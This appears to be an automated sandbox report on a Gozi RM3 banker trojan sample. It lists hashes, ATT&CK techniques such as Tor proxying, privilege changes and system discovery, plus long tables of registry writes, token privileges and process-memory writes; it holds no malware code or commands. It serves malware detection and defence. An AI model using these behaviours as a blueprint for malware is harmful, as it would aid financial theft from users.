gozi_rm3 | 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Resubmissions

15-03-2022 08:05

220315-jy3feaahdk 10

15-03-2022 07:24

220315-h8lpzaghf8 10

Analysis

max time kernel
1696s
max time network
1776s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
15-03-2022 08:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Restr.exe
Size

252KB
MD5

16959900ff34c0ba60fe2a4d9f1242c5
SHA1

888148f1b31355192e26ea4fc97c91f4c4defe9e
SHA256

0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
SHA512

a2b7a74fdc6525c5b8ecafc66706136e1e3996e28ebb3b1d8e236b120e59f8c4e85165f385365d706a8391ae2a5f30530a086c7820e26d1a6cd2f19a44da5d54

Score

10^/10

gozi_rm3 banker trojan

Malware Config

Extracted

Family

gozi_rm3

Attributes

build
300994

rsa_pubkey.plain

Signatures

Gozi RM3
A heavily modified version of Gozi using RM3 loader.
banker trojan gozi_rm3
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3316	4376	WerFault.exe	78

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
4768	net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1436	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5076	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2317671783"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1064f97d4338d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000af0b005e4d17189b80f17a7a9b9fae8dde5b3ee941963c35b330c332e6c35938000000000e800000000200002000000032baa51108dee1171cafe41bc03a45193341b239dbbd1408288a071e2f31768cc00000008ca69103c90cbb9d70b1dc7a31329374def34971f2aee6fbf1665acd6aaf5680586a96c25d07de46f72c857cd5be0137b5b4c77015a65ead41299de3b7b25e906d0554705b4ca6e6ad0056c11cbd420825ea7b34e4316dcacb0a6f31764665ac9b9640f2d0da0c5d3828eeb7fb42f1f88e7d024a56954cf1bbc8f3266f7f0e2b352dd10f2f04ee5e9ae47bb8baa33fbba0f98fc0c9bfe063f614272d2285f8a4eeed9b63edf4ea9e8e3f48a2df5965aeac7cbdd08b7725051a082d5fccb20603400000005832b57c34f5d8a5a89e69e152e47853950844bd6fed7a58a134c958bf9abafdbf9c8638699242eddfcd4935002207c77e54ae8c0073a45a376167519021c399	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000694908dbfb46b57cd6968555a943005e9119959593d00753b9321fd109749f6f000000000e8000000002000020000000bb00d8a1068d77372474e6e05666d87be8542d8d50dcfa6309fd3e30a23dcc6120000000bdd9b023ff3c8e96d682cc50e317e1622624ec1843c96d1648c5d9f55206baf84000000092099aac9dd1ede2d30e05180d80f415c8a1be5f00a5222873d56860a8a83c00fbf63ab02ece3f848ccc883fa7e0f00e778ae2c5406c37d5c1f8592155cdcf78	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000e326887780a1cc42463cf93e23f06042acd5c980d89817792e775c618e0d43b8000000000e800000000200002000000055abac4686cabcc75247a81859be176f7a560c2c5bfd9dda27ff2afd67379033c00000002ff4356701135e094e80d75fdaecb8ab772ee676e5e01642c2a33e9bbf7e50375c8ee026ab0ccedb8787c7227d038aa46a402eca5c23325f7a4a451fdf6550daef8010e84deb2c9233436cb973eef1bf3aee4f921b581c1a1a27ad861e06fe37e191674716cb4ba64c2b6cbb6a4ca3d6e00a03571ff046a6fb7ca87f8b162b50f986670d5dd33eabbebccd8d2078011006a75e6db928b405f228ed9e790a55394f4503bb8024ecc4a3c69714d843817dd540a43745fb7767daf7ee1ddc22443840000000d014b15674dd9636b3652290fec5ed434ee14b05cd1fd10a50f2a0a2459d7129398ae538fb5ae639fd49cf02f80b36dd2733af24d7c80a0f0f37a0be1badc496	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947395"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000003b5e9f8a3527493be13b41a2ebf9589c6a62d994d237ab9a902929e775e008db000000000e8000000002000020000000cc4c139c1f3d8410a3fd4853043fbe56b3d607b907b48298c54eacf00a9abd47c000000089e50698452806b0aee4c5b9089a35317661a825ac7b9d014527f1bcea9113a7ef7c06ac14da56fbee2af2dffcd63be96c075c9d8669adb3ee1122baf68e8e3a142f0ecb52f0046426d9aebb71f83e81d052bdb33f00fe5e454da98ca70b35a105afbaeb1f1aac26a1b3cbfd5552ec2bb815cba9fce85e4e284027fb3a5c50ec101b8f150dec2c9304f7ba46fe8660bb4c822f437fb42b08d6d262fed0f90354504905d57ed89a0a20333c547e510e2f60d76f146a03e117168ef32b23af7a4f40000000015aa826f466813f1d71d4311b3427b7a381f759fb95d11b8a0305c39a3d97ff37ea1b218cb305c18ac1d2bc089c6aa515ec559afab86ac24cd68446d0989b39	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B5C4DBF1-A436-11EC-B9A4-4AFEF23D9694} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000002b81c0d1b0f11c7d4a69ac85f855dd5d3531371c745e79c1748263e9f65aafd7000000000e8000000002000020000000dec3bf4126fc2cec7658286bf2e75aea9cd303e274940af838a83d99b480d4a4c00000006a2273a44b604d49362481938faa54560d195fa9f572a0a70def88063b2e9ad78e8e23cea03120b97dc5495883d4a4d685fd288eb16ce0ebc9f0efaa8c6b0980c3286da79ce6fe3a2785adb3234965c736173a61fdf2ef35ec210c1a0a7ff3079f02b801b4f94159e3f1413998d7afbe4a6700c1257ec98e75f4a984f059e5e25d2f7c4c0bd78d47ec8f2a5a63f5c24a6ed338bad5258a4a45e294fb404b8319db27e63f91e15f40a8e0c863ff3e38fda6f967df22b01efdba3f2d90cc58b390400000008eab2544967c183af1aa951bde7de48503e099d1f9f342e1cc63bdf17b379cc3fbf7a265e549ff3d69a16a024e76b5ff318f32fd03c6ad372e8d81b1f79e8fe6	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000008b909b8338d4738f4b3b2e4dcbe9cf0e2b037d12806396cf22528efc111641bb000000000e8000000002000020000000366574914b9a1bd144898af76963d69ad400b90ba988cc139251325775b3fe2d200000001129b6fe636ba60b01daa27e12b9ab8fdc1487eff7892c55d8b815f2cb97ee5440000000f7cdcb0ff5fdc78d44c377472c443e9f35b6f7984431996e83c3ea46c09db82d47785179d8f732a0b5ffafb83318a2edcf3f22a3964433b7815b60c96d4348bb	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000a66e371bb720c51e3ce959f7d76bb8c3cdb54906ddbacd6d16db9979ca8ee8fa000000000e800000000200002000000004b2a81af273a64ddc93af4aaa6f1741e55ca8e7ecb1b47489aad81f732e0205c0000000c1f9028bd43c6aab06677e5630a882416d5ecf594f78ce11bb4c7923d0cc945b015466f8e51f0eebadb06f225dd20801fb75bc06aada4047ce0c0b6b94a26fe7b7521eb0939e853f0e4c4534a8330afa77b05b9c674f7ae16c976509c0a5f253be1f71376005c18e943fe2cdf0449867f0de57d66c9983a2dbac1641bb19d0f6ff8b83536d8555b7f15507f68f55b707ea684b69deba8d1e18914d13d00d54f582e00c836065ad39d3093e75418b58bf996b600f7f54f9c94acf72a991a1f90f400000000e708e0f62d9f0fe62c53eb447fa000d062a052fcaf6e7dc4811e627bbc9696165c7c7723fca50b823d0c92ed7dda40a63d46d1f2565fe9605bc7f37542b1b31	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947395"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000001f0aae9c0cd96dd491fc79ea15f0f6b636f967a6f3e23a18a441c4f3b0700d29000000000e800000000200002000000030a6ccf90c261a9482e7b4eedd1a54fa7bf5c252b59730b66240bf4ca554439ac00000009b6104ba8a136c318627f726fe926fa27afe30b366686bafc68e78b1b2a2132075e1d95790f16752f40207991ff7660d0694967f433347839165e8ab49734d841ff3735b4f36f968769a95996862c954c0302d109461a8b60a7703e5ef06ff67fa7dfec1876f9f9de6bd4d6c64cd3a462e6ac9acd58bfa6df8ab3f4a7e30be5b18ba8b378c44ed254394a86d22964cd4f297d4f296594c1fd3d0ad752e1f75be53ad75961b05f64646fdd98dd383bb4c6ebeb952130f00349d0cdfa782e2a2de400000003b47780404277f566799d740c110b41ce78ba25f81f641c2525b308b772869bc5c9ea86d3b67489239ed8827e40e915281086f4450d75b62ba9ec69759879750	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000dab01f0f7faab4215f0fcb8b440aa7fe3462ab84531a7e991078e12322072e96000000000e800000000200002000000066f74c5f8304307b95bcb2799d4aa71384ea31b06948dda581989f0f3f73620fc0000000212ed449ae5d1b9a6ec1de03d13106297abfea4735369036b56e487aa036316c1256bc6d0b418a08b0e4c60b09c498a9d59160251f7a8e455bfde4c620e2fe70b2f144789ea683cfa5ed534706285fb43bec4e243c3e7dcfb1f6e3e1b54293543b34ff6a82ca84e9e4f66d4ccd7b72dfa50275a4d176e4c39382dca21eece1f0731a213e19312d6182ecf8c85ea6e26075cb1267dbb6ae952633120216c79f3fff6a627f5f9cb1ed801920a346f87adf7cd20f1f54f5254d9930b71c902d4086400000007ed9abcba78840c86d9f40c12c1be9a627f825e5fbbd6fb78fea9301c6e0bd1928dffe8f87d3565e508b3acf3294883c92f00226b0cfce0b58fda69926825808	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000411587c25fe2549f47ac2ac20e6f02c2d12e2e48d4f22792472c74a43ec7d78b000000000e800000000200002000000088cb7284ad731794a44ee084fa73c72f4c7338652efa5b2eec4666fe23b1e1f0c00000009d93904ecaaad13abbf02c36ccad44b328e7b4c97957f2f7bbbbb8c6b6f368729bfbd3117aaf84d358ec421d1f313dd91780fa5dfefa28260e87f5f401955b0ab2ea80fbe028949043da6502a0f9ac30025034237511fdbd5a90a1a7bd8474eaca17673282739409211b3f61438b5403670e140d21be409f7fd95225268f0dc265aeda3c5bc9fb42570bde13b56213494b074f84e5793637cf82e13983e6ab832cd13d67094430c3c50b623e208c5b3b4d1a46cd39c4e130d78c3e63ca8c3e3e40000000a6f09b7d58a33e4e1cf57008065497942cbe53dbe2316009d86aa8245f160d2594e8c44028950d7ad387b82a8e5ad8eb8e81c243c22c0d5610f3cceb64e544eb	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2317671783"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80997d7c4338d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3884	powershell.exe
3884	powershell.exe
3896	powershell.exe
3896	powershell.exe
2864	powershell.exe
2864	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3884	powershell.exe
4376	Restr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	4132	whoami.exe
Token: SeDebugPrivilege	1436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	504	WMIC.exe
Token: SeSecurityPrivilege	504	WMIC.exe
Token: SeTakeOwnershipPrivilege	504	WMIC.exe
Token: SeLoadDriverPrivilege	504	WMIC.exe
Token: SeSystemProfilePrivilege	504	WMIC.exe
Token: SeSystemtimePrivilege	504	WMIC.exe
Token: SeProfSingleProcessPrivilege	504	WMIC.exe
Token: SeIncBasePriorityPrivilege	504	WMIC.exe
Token: SeCreatePagefilePrivilege	504	WMIC.exe
Token: SeBackupPrivilege	504	WMIC.exe
Token: SeRestorePrivilege	504	WMIC.exe
Token: SeShutdownPrivilege	504	WMIC.exe
Token: SeDebugPrivilege	504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	504	WMIC.exe
Token: SeRemoteShutdownPrivilege	504	WMIC.exe
Token: SeUndockPrivilege	504	WMIC.exe
Token: SeManageVolumePrivilege	504	WMIC.exe
Token: 33	504	WMIC.exe
Token: 34	504	WMIC.exe
Token: 35	504	WMIC.exe
Token: 36	504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	504	WMIC.exe
Token: SeSecurityPrivilege	504	WMIC.exe
Token: SeTakeOwnershipPrivilege	504	WMIC.exe
Token: SeLoadDriverPrivilege	504	WMIC.exe
Token: SeSystemProfilePrivilege	504	WMIC.exe
Token: SeSystemtimePrivilege	504	WMIC.exe
Token: SeProfSingleProcessPrivilege	504	WMIC.exe
Token: SeIncBasePriorityPrivilege	504	WMIC.exe
Token: SeCreatePagefilePrivilege	504	WMIC.exe
Token: SeBackupPrivilege	504	WMIC.exe
Token: SeRestorePrivilege	504	WMIC.exe
Token: SeShutdownPrivilege	504	WMIC.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe
2420	iexplore.exe

Suspicious use of SetWindowsHookEx 44 IoCs

pid	Process
2420	iexplore.exe
2420	iexplore.exe
2728	IEXPLORE.EXE
2728	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
1748	IEXPLORE.EXE
1748	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
4592	IEXPLORE.EXE
4592	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
3596	IEXPLORE.EXE
3596	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
2180	IEXPLORE.EXE
2180	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
4732	IEXPLORE.EXE
4732	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
1564	IEXPLORE.EXE
1564	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
2320	IEXPLORE.EXE
2320	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
4184	IEXPLORE.EXE
4184	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
2012	IEXPLORE.EXE
2012	IEXPLORE.EXE
2420	iexplore.exe
2420	iexplore.exe
3344	IEXPLORE.EXE
3344	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 2728	2420	iexplore.exe	87
PID 2420 wrote to memory of 2728	2420	iexplore.exe	87
PID 2420 wrote to memory of 2728	2420	iexplore.exe	87
PID 2420 wrote to memory of 1748	2420	iexplore.exe	89
PID 2420 wrote to memory of 1748	2420	iexplore.exe	89
PID 2420 wrote to memory of 1748	2420	iexplore.exe	89
PID 2420 wrote to memory of 4592	2420	iexplore.exe	92
PID 2420 wrote to memory of 4592	2420	iexplore.exe	92
PID 2420 wrote to memory of 4592	2420	iexplore.exe	92
PID 2420 wrote to memory of 3596	2420	iexplore.exe	93
PID 2420 wrote to memory of 3596	2420	iexplore.exe	93
PID 2420 wrote to memory of 3596	2420	iexplore.exe	93
PID 2420 wrote to memory of 2180	2420	iexplore.exe	94
PID 2420 wrote to memory of 2180	2420	iexplore.exe	94
PID 2420 wrote to memory of 2180	2420	iexplore.exe	94
PID 2420 wrote to memory of 4732	2420	iexplore.exe	95
PID 2420 wrote to memory of 4732	2420	iexplore.exe	95
PID 2420 wrote to memory of 4732	2420	iexplore.exe	95
PID 2420 wrote to memory of 1564	2420	iexplore.exe	96
PID 2420 wrote to memory of 1564	2420	iexplore.exe	96
PID 2420 wrote to memory of 1564	2420	iexplore.exe	96
PID 2420 wrote to memory of 2320	2420	iexplore.exe	97
PID 2420 wrote to memory of 2320	2420	iexplore.exe	97
PID 2420 wrote to memory of 2320	2420	iexplore.exe	97
PID 2420 wrote to memory of 4184	2420	iexplore.exe	98
PID 2420 wrote to memory of 4184	2420	iexplore.exe	98
PID 2420 wrote to memory of 4184	2420	iexplore.exe	98
PID 2420 wrote to memory of 2012	2420	iexplore.exe	100
PID 2420 wrote to memory of 2012	2420	iexplore.exe	100
